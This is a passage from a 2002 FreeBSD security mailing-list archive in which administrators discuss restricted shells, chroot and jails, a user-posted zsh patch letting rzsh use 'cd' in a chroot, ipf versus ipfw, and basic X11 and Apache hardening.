(balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 7BABB37B406 for ; Wed, 8 May 2002 15:12:33 -0700 (PDT) Received: (qmail 3803 invoked from network); 8 May 2002 22:12:31 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 8 May 2002 22:12:31 -0000 Content-Type: text/plain; charset="iso-8859-1" From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: Anthony Schneider Subject: Re: Accounts with Restricted privileges Date: Wed, 8 May 2002 16:08:21 -0600 X-Mailer: KMail [version 1.4] References: <200205081443.51457.dowen@pstis.com> <20020508171717.A37592@mail.slc.edu> In-Reply-To: <20020508171717.A37592@mail.slc.edu> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205081608.21273.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On May 8, 2002 03:17 pm, you wrote: Nope. rbash disables "cd", remember? :) I need to be able to browse=20 subdirectories. > if you don't have any luck finding a shell with chrootability, you coul= d > easily write a simple setuid wrapper to chroot() and then execute rbash= , > where rbash is located within the chrooted file hierarchy. > -Anthony. > > On Wed, May 08, 2002 at 02:43:51PM -0600, Dalin S. Owen wrote: > > On May 8, 2002 10:31 am, Justin King wrote: > > > > Actually.. I am looking for the almost same answer... what about a > > chroot-ed shell? ie. they can "cd" forwards but not back beyond my > > designated "/"... and I quote (from bash's manpage): > > > > "When a command that is found to be a shell script is exe- > > cuted (see COMMAND EXECUTION above), rbash turns off any > > restrictions in the shell spawned to execute the script." > > > > I don't want that. I want all other processes to be chrooted too. B= y > > now some of you are thinking "jail"... A jail won't cut it, because y= ou > > can't use quotas in a jail. > > > > Does anyone know to do this with bash, or any other shell? I recall > > someone talking about a shell that could do all of the above. > > > > Thanks!:) > > > > FreeBSD Rox, BTW! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 15:16:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 7C30A37B409 for ; Wed, 8 May 2002 15:15:43 -0700 (PDT) Received: (qmail 3888 invoked from network); 8 May 2002 22:15:41 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 8 May 2002 22:15:41 -0000 Content-Type: text/plain; charset="iso-8859-1" From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: "Nielsen" Subject: Re: Accounts with Restricted privileges Date: Wed, 8 May 2002 16:11:31 -0600 X-Mailer: KMail [version 1.4] References: <200205081443.51457.dowen@pstis.com> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205081611.31348.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On December 31, 1969 04:59 pm, you wrote: That is not good on a system with 1000's of users... and I have different= =20 users and UID's for inside my jails and outside.... Having a seperate quo= ta=20 file + system for jails would be real nice... maybe when I have time I wi= ll=20 write it. > Hmmm, I've used quotas in a jail. Just set the quotas on the host syste= m > with the same user ids. You can't "quota" the root user in a jail, but > other users can be done quite nicely. Besides if you really want to giv= e a > quota to directory tree (not a user) you probably should be using vn > devices. > > > I don't want that. I want all other processes to be chrooted too. B= y > > now some of you are thinking "jail"... A jail won't cut it, because y= ou > > can't > > use > > > quotas in a jail. > > all the best, > > Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 15:25:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 00B6F37B400; Wed, 8 May 2002 15:25:52 -0700 (PDT) Received: from cairo.anu.edu.au (localhost [127.0.0.1]) by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id g48MPo3g023731; Thu, 9 May 2002 08:25:50 +1000 (EST) Received: (from avalon@localhost) by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id g48MPnML023729; Thu, 9 May 2002 08:25:49 +1000 (EST) From: Darren Reed Message-Id: <200205082225.g48MPnML023729@cairo.anu.edu.au> Subject: Re: ipf vs. ipfw To: wollman@khavrinen.lcs.mit.edu (Garrett Wollman) Date: Thu, 9 May 2002 08:25:49 +1000 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG In-Reply-To: <200205081556.g48FuY0q084024@khavrinen.lcs.mit.edu> from "Garrett Wollman" at May 08, 2002 11:56:34 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Garrett Wollman, sie said: > > < said: > > > ipfw does share its roots with the linux ipfw but linux long ago dropped > > its one and the freebsd one is now much different. > > It is possible that the old Lignux `ipfw' was based on FreeBSD's; not > the other way around. You might be right about that as I believe there was attribution in Linux to FreeBSD. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 15:34: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 457A437B400; Wed, 8 May 2002 15:34:01 -0700 (PDT) Received: from cairo.anu.edu.au (localhost [127.0.0.1]) by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id g48MXv3g024458; Thu, 9 May 2002 08:33:57 +1000 (EST) Received: (from avalon@localhost) by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id g48MXtIK024453; Thu, 9 May 2002 08:33:55 +1000 (EST) From: Darren Reed Message-Id: <200205082233.g48MXtIK024453@cairo.anu.edu.au> Subject: Re: ipf vs. ipfw To: tal@lumeta.com (Tom Limoncelli) Date: Thu, 9 May 2002 08:33:55 +1000 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG In-Reply-To: <3CD95E0F.A3E7398C@lumeta.com> from "Tom Limoncelli" at May 08, 2002 01:19:11 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Tom Limoncelli, sie said: > > Thanks to everyone that answered my questions. As in true Usenet > tradition, if you want the full story, post a message with a lot of > incorrect statements. I got much better results than the carefully thought > out queries that I had sent to various people. :-) > > I've updated my page > http://whatexit.org/tal/mywritings/freefilters.html The line entry for pf is wrong. It is defaintely not a superset of IPFilter or ipfw or any of the other free packet filtering systems. It should simply say pf includes the listed features. You also do not mention SunScreen. Version 3.1(Lite) came with Solaris8, 3.2 will be bundled with Solaris9 (don't know if this is the Lite version or not). Don't know if anyone actually uses it, either. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 15:55:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-43.dsl.lsan03.pacbell.net [63.207.60.43]) by hub.freebsd.org (Postfix) with ESMTP id 49A4737B408 for ; Wed, 8 May 2002 15:55:10 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 929D566DC9; Wed, 8 May 2002 15:55:09 -0700 (PDT) Date: Wed, 8 May 2002 15:55:09 -0700 From: Kris Kennaway To: Mark Hartley Cc: freebsd-security@freebsd.org Subject: Re: support for RELENG_4_4 Message-ID: <20020508155509.E92543@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NtwzykIc2mflq5ck" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from mark@work.drapple.com on Wed, May 08, 2002 at 01:47:58PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --NtwzykIc2mflq5ck Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, May 08, 2002 at 01:47:58PM -0700, Mark Hartley wrote: > 1. Is the 4_4 branch about to lose it's status as a "receives all security > fixes" branch? I believe it's still the intention. It's been the official policy for many years (documented on the security webpage), although in the past (during my time as security officer) we did the extra work of extending support for some older branches beyond their official lifetime. I considered that work to be purely an additional courtesy to the users of older branches though, and not something we were bound by policy to continue. Kris --NtwzykIc2mflq5ck Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE82azMWry0BWjoQKURAvSSAKDctbEyUqZNkv7xd1hRb754/rOz3QCdHUZk BVr0rwXdnxcz74MttejA5Lw= =jiIJ -----END PGP SIGNATURE----- --NtwzykIc2mflq5ck-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 17:58:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f136.law14.hotmail.com [64.4.21.136]) by hub.freebsd.org (Postfix) with ESMTP id D0F9437B423 for ; Wed, 8 May 2002 17:58:16 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 8 May 2002 17:58:16 -0700 Received: from 209.124.231.186 by lw14fd.law14.hotmail.msn.com with HTTP; Thu, 09 May 2002 00:58:15 GMT X-Originating-IP: [209.124.231.186] From: "William J. Borskey" To: security@freebsd.org Subject: ethernet firewall Date: Wed, 08 May 2002 17:58:15 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 09 May 2002 00:58:16.0117 (UTC) FILETIME=[9A1D9E50:01C1F6F4] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org can i use ethfw and ipfw at the same time? if i make a rule in ethfw to only allow access to port 139 from a certain ethernet address, do i also have to allow it in ipfw? _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 18:29:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (dav38.law15.hotmail.com [64.4.22.95]) by hub.freebsd.org (Postfix) with ESMTP id 0B63F37B40E for ; Wed, 8 May 2002 18:29:20 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 8 May 2002 18:29:19 -0700 X-Originating-IP: [24.217.152.66] From: "aman netsec" To: References: Subject: Re: ethernet firewall Date: Wed, 8 May 2002 20:25:38 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 09 May 2002 01:29:19.0976 (UTC) FILETIME=[F10FEE80:01C1F6F8] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I haven't but, I think you can have both at the same time - just needs extra care!!! Do you mean that you are denying everything else when u say "only allow access to port 139". You will indeed need to allow it in ipfw, because it will block it from getting to the upper layers on the stack. This is net-bios and won't do any good down below in the stack. Hope it helps Aman ----- Original Message ----- From: "William J. Borskey" To: Sent: Wednesday, May 08, 2002 5:58 PM Subject: ethernet firewall > > > can i use ethfw and ipfw at the same time? if i make a rule in ethfw to only > allow access to port 139 from a certain ethernet address, do i also have to > allow it in ipfw? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 18:55: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f42.pav0.hotmail.com [64.4.32.226]) by hub.freebsd.org (Postfix) with ESMTP id 0736237B407 for ; Wed, 8 May 2002 18:55:04 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 8 May 2002 18:55:03 -0700 Received: from 24.217.8.73 by pv0fd.pav0.hotmail.msn.com with HTTP; Thu, 09 May 2002 01:55:03 GMT X-Originating-IP: [24.217.8.73] From: "Chest Rockwell" To: FreeBSD-security@FreeBSD.org Subject: 2 questions. permission and kde. Date: Wed, 08 May 2002 20:55:03 -0500 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 09 May 2002 01:55:03.0855 (UTC) FILETIME=[89492BF0:01C1F6FC] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i have a remote webserver where i cant leave my home folder. ie /usr/home/marley, i'm not able to get out of the marley dir. is that just a permission setting, or a program or something else? how can i set it up on my machine so that someone would be set to 1 dir and not able to move out of it? the 2nd q is: i've setup my freebsd 4.5 machine and didn't install xwindows. is there any security risks in doing so? if i go through /stand/sysinstall, what would i have to setup to be able to run xwindows using kde. there is a whole list and i'm guessing that i only need a couple of them. thx in advance, marley _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 19:20:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from imation.homenetweb.com (noc-p5-3-ky-4.homenetweb.com [216.7.67.90]) by hub.freebsd.org (Postfix) with ESMTP id 50DEC37B411 for ; Wed, 8 May 2002 19:20:18 -0700 (PDT) Received: from noc2 (d2i-dialin-130.kl.terranova.net [216.89.230.130]) by imation.homenetweb.com (8.12.3/8.12.3) with SMTP id g492KBf9001049; Wed, 8 May 2002 22:20:12 -0400 (EDT) Message-ID: <000701c1f6ff$8fd85f60$0101a8c0@noc2> From: "Richard Ward" To: "Chest Rockwell" , References: Subject: Re: 2 questions. permission and kde. Date: Wed, 8 May 2002 22:16:32 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > i have a remote webserver where i cant leave my home folder. ie > /usr/home/marley, i'm not able to get out of the marley dir. is that just a > permission setting, or a program or something else? how can i set it up on > my machine so that someone would be set to 1 dir and not able to move out of > it? jail(2). -- Richard Ward, GM Home Net Web, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 19:25:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from imation.homenetweb.com (noc-p5-3-ky-4.homenetweb.com [216.7.67.90]) by hub.freebsd.org (Postfix) with ESMTP id 0838037B403 for ; Wed, 8 May 2002 19:25:25 -0700 (PDT) Received: from noc2 (d2i-dialin-130.kl.terranova.net [216.89.230.130]) by imation.homenetweb.com (8.12.3/8.12.3) with SMTP id g492PJf9001072; Wed, 8 May 2002 22:25:20 -0400 (EDT) Message-ID: <001301c1f700$47474bc0$0101a8c0@noc2> From: "Richard Ward" To: "Richard Ward" , "Chest Rockwell" , References: <000701c1f6ff$8fd85f60$0101a8c0@noc2> Subject: Re: 2 questions. permission and kde. Date: Wed, 8 May 2002 22:21:47 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry. I misunderstood the question. Try chroot(2) instead. -- Richard Ward, GM Home Net Web, Inc. ----- Original Message ----- From: Richard Ward To: Chest Rockwell ; Sent: Wednesday, May 08, 2002 10:16 PM Subject: Re: 2 questions. permission and kde. > > i have a remote webserver where i cant leave my home folder. ie > > /usr/home/marley, i'm not able to get out of the marley dir. is that just > a > > permission setting, or a program or something else? how can i set it up > on > > my machine so that someone would be set to 1 dir and not able to move out > of > > it? > > jail(2). > -- > Richard Ward, GM > Home Net Web, Inc. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 19:58:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id C2E5937B400 for ; Wed, 8 May 2002 19:58:09 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g492w4cI062491 for ; Wed, 8 May 2002 22:58:10 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Wed, 8 May 2002 22:57:59 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: Re: 2 questions. permission and kde. In-Reply-To: Message-ID: <20020508224922.S62456-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 8 May 2002, Chest Rockwell wrote: > i have a remote webserver where i cant leave my home folder. ie > /usr/home/marley, i'm not able to get out of the marley dir. is that just a > permission setting, or a program or something else? how can i set it up on > my machine so that someone would be set to 1 dir and not able to move out of > it? You're not able to browse out of the marley dir, or you're not able to get a shell and cd out of ~marley? If the former, it's trivial to set that up: add the following snippet to httpd.conf, and then chmod o-rwx on /usr/home: # # UserDir: The name of the directory that is appended onto a user's home # directory if a ~user request is received. # UserDir public_html AllowOverride none Options IncludesNoExec Order allow,deny Allow from all Order deny,allow Deny from all That may be a little more restrictive than you need, or not quite restrictive enough. Directory browsing is turned off in this example. > the 2nd q is: i've setup my freebsd 4.5 machine and didn't install xwindows. > is there any security risks in doing so? if i go through > /stand/sysinstall, what would i have to setup to be able to run xwindows > using kde. there is a whole list and i'm guessing that i only need a couple > of them. Block ports 6000-6063 on your external interface and you should be OK. Install the Xwrapper port so that you don't have to run your X server as root. Sure, there can be security risks if you have malicious users on your LAN who know what they're doing, or if you share the machine with same. If this is your home machine, no worries unless you don't trust your wife or kids (but still block those ports at the external interface). In the office, I typically only had one NIC, and I blocked X traffic on the NIC, but allowed it on the loopback device. When I needed to display remote applications back to my display, I tunnelled X through ssh ('ssh -X hostname; xterm -display mybox:0') after setting up xauth correctly. To set up KDE, first set up XFree86-4. It's easiest just to build the metaport: cd /usr/ports/x11/XFree86-4; make install clean Then cd /usr/ports/x11/kde3; make install clean It'll take awhile. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net Turning coffee into software since 1990. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 20:22:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from slc.edu (weir-01c.slc.edu [207.106.89.46]) by hub.freebsd.org (Postfix) with ESMTP id 816BE37B403 for ; Wed, 8 May 2002 20:22:52 -0700 (PDT) Received: (from anthony@localhost) by slc.edu (8.11.6/8.11.6) id g493P8R64852; Wed, 8 May 2002 23:25:08 -0400 (EDT) (envelope-from anthony) Date: Wed, 8 May 2002 23:25:07 -0400 From: Anthony Schneider To: "Dalin S. Owen" Cc: security@freebsd.org Subject: Re: Accounts with Restricted privileges Message-ID: <20020508232507.B48952@mail.slc.edu> References: <200205081443.51457.dowen@pstis.com> <20020508171717.A37592@mail.slc.edu> <200205081608.21273.dowen@pstis.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dkEUBIird37B8yKS" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200205081608.21273.dowen@pstis.com>; from dowen@pstis.com on Wed, May 08, 2002 at 04:08:21PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --dkEUBIird37B8yKS Content-Type: multipart/mixed; boundary="FkmkrVfFsRoUs1wW" Content-Disposition: inline --FkmkrVfFsRoUs1wW Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable ah, my bad. i'll try to read better next time. :) so what you really want is rbash without the 'cd' limitation, but also chrooted? I have here a patch i just sorta whipped up (read: crude and hardly tested, but seems to work) which allows the cd builtin to be executed. so, if you are in a chrooted environment, cd should work, and all of the rest of the restritions should apply that come along with using restricted zsh (zsh, in case you don't know, is IMStubbornlyHO, a very nice shell, with almost, if not exactly, the same syntax features as bash, including restriction by copying zsh to rzsh). Again, this is very untested, but you should be able to apply this to builtin.c in the Src/ directory of zsh-4.0.4. I'll email zsh-workers, and see if maybe they'd consider making compilation of particular environment restrictions configurable on a per-restriction basis. Hope this helps. -Anthony. On Wed, May 08, 2002 at 04:08:21PM -0600, Dalin S. Owen wrote: > On May 8, 2002 03:17 pm, you wrote: >=20 > Nope. rbash disables "cd", remember? :) I need to be able to browse=20 > subdirectories. >=20 > > if you don't have any luck finding a shell with chrootability, you could > > easily write a simple setuid wrapper to chroot() and then execute rbash, > > where rbash is located within the chrooted file hierarchy. > > -Anthony. > > > > On Wed, May 08, 2002 at 02:43:51PM -0600, Dalin S. Owen wrote: > > > On May 8, 2002 10:31 am, Justin King wrote: > > > > > > Actually.. I am looking for the almost same answer... what about a > > > chroot-ed shell? ie. they can "cd" forwards but not back beyond my > > > designated "/"... and I quote (from bash's manpage): > > > > > > "When a command that is found to be a shell script is exe- > > > cuted (see COMMAND EXECUTION above), rbash turns off any > > > restrictions in the shell spawned to execute the script." > > > > > > I don't want that. I want all other processes to be chrooted too. By > > > now some of you are thinking "jail"... A jail won't cut it, because y= ou > > > can't use quotas in a jail. > > > > > > Does anyone know to do this with bash, or any other shell? I recall > > > someone talking about a shell that could do all of the above. > > > > > > Thanks!:) > > > > > > FreeBSD Rox, BTW! ----------------------------------------------- PGP key at: http://www.keyserver.net/ http://www.anthonydotcom.com/gpgkey/key.txt Home: http://www.anthonydotcom.com ----------------------------------------------- --FkmkrVfFsRoUs1wW Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="restr_cd.path" Content-Transfer-Encoding: quoted-printable --- builtin.c Wed May 8 23:22:27 2002 +++ builtin.c.orig Wed May 8 23:12:24 2002 @@ -685,14 +685,10 @@ LinkNode dir; struct stat st1, st2; =20 - /* -- added 5.08.02, Anthony Schneider; allow cd in restricted mode - so rzsh may run slightly less restricted in a chroot()'ed - environment. if (isset(RESTRICTED)) { zwarnnam(nam, "restricted", NULL, 0); return 1; } - */ doprintdir =3D (doprintdir =3D=3D -1); =20 for (; *argv && **argv =3D=3D '-'; argv++) { --FkmkrVfFsRoUs1wW-- --dkEUBIird37B8yKS Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjzZ7BIACgkQ+rDjkNht5F0CegCfTDLqipr7HaDu/lj4+El0Jo1q yNAAoKatJbqWnRcQLRpi2cpjMictqRM3 =pMaS -----END PGP SIGNATURE----- --dkEUBIird37B8yKS-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 20:34:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from slc.edu (weir-01c.slc.edu [207.106.89.46]) by hub.freebsd.org (Postfix) with ESMTP id C34C937B400 for ; Wed, 8 May 2002 20:34:36 -0700 (PDT) Received: (from anthony@localhost) by slc.edu (8.11.6/8.11.6) id g493arW65688; Wed, 8 May 2002 23:36:53 -0400 (EDT) (envelope-from anthony) Date: Wed, 8 May 2002 23:36:53 -0400 From: Anthony Schneider To: "Dalin S. Owen" Cc: security@FreeBSD.ORG Subject: Re: Accounts with Restricted privileges Message-ID: <20020508233653.A65507@mail.slc.edu> References: <200205081443.51457.dowen@pstis.com> <20020508171717.A37592@mail.slc.edu> <200205081608.21273.dowen@pstis.com> <20020508232507.B48952@mail.slc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="cmJC7u66zC7hs+87" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020508232507.B48952@mail.slc.edu>; from aschneid@mail.slc.edu on Wed, May 08, 2002 at 11:25:07PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --cmJC7u66zC7hs+87 Content-Type: multipart/mixed; boundary="HlL+5n6rz5pIUxbD" Content-Disposition: inline --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: inline wow, that patch was backwards. OOPS! -Anthony. ----------------------------------------------- PGP key at: http://www.keyserver.net/ http://www.anthonydotcom.com/gpgkey/key.txt Home: http://www.anthonydotcom.com ----------------------------------------------- --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="restr_cd.path" Content-Transfer-Encoding: quoted-printable --- builtin.c.orig Wed May 8 23:29:29 2002 +++ builtin.c Wed May 8 23:22:27 2002 @@ -685,10 +685,14 @@ LinkNode dir; struct stat st1, st2; =20 + /* -- added 5.08.02, Anthony Schneider; allow cd in restricted mode + so rzsh may run slightly less restricted in a chroot()'ed + environment. if (isset(RESTRICTED)) { zwarnnam(nam, "restricted", NULL, 0); return 1; } + */ doprintdir =3D (doprintdir =3D=3D -1); =20 for (; *argv && **argv =3D=3D '-'; argv++) { --HlL+5n6rz5pIUxbD-- --cmJC7u66zC7hs+87 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjzZ7tUACgkQ+rDjkNht5F2Z4wCbB6fYumfOToUzo3pd4eu4mHLd tVgAnAtqCOVW+trzFOu9aNCJ34RD7cjB =6gHY -----END PGP SIGNATURE----- --cmJC7u66zC7hs+87-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 8:41:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id CD26A37B404 for ; Thu, 9 May 2002 08:41:02 -0700 (PDT) Received: from pen.centtech.com (pen.centtech.com [10.177.178.33]) by prox.centtech.com (8.11.6/8.11.6) with ESMTP id g49Ff1714824 for ; Thu, 9 May 2002 10:41:01 -0500 (CDT) Received: from centtech.com (proton.centtech.com [10.177.173.77]) by pen.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g49Ff1P25477 for ; Thu, 9 May 2002 10:41:01 -0500 (CDT) Message-ID: <3CDA988D.34E2148C@centtech.com> Date: Thu, 09 May 2002 10:41:01 -0500 From: Eric Anderson Reply-To: anderson@centtech.com X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: ipnat and bimapping Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm setting up a NAT gateway/firewall. It has three interfaces on it (one to the big bad net, one to the protected net, and one to a DMZ kind of net). Basically, I'm currently using the first two ports (big bad net, and protected net), but I'd like to enable that third net, without stabbing myself and creating security holes, but allowing a single machine to be "wide open" behind the gateway. So, here's what my setup looks like: Internet | | [24.24.24.1/32] Nat/Gateway box [10.10.20.1, 10.10.10.1] /\ / \ / \ wide [protected net, 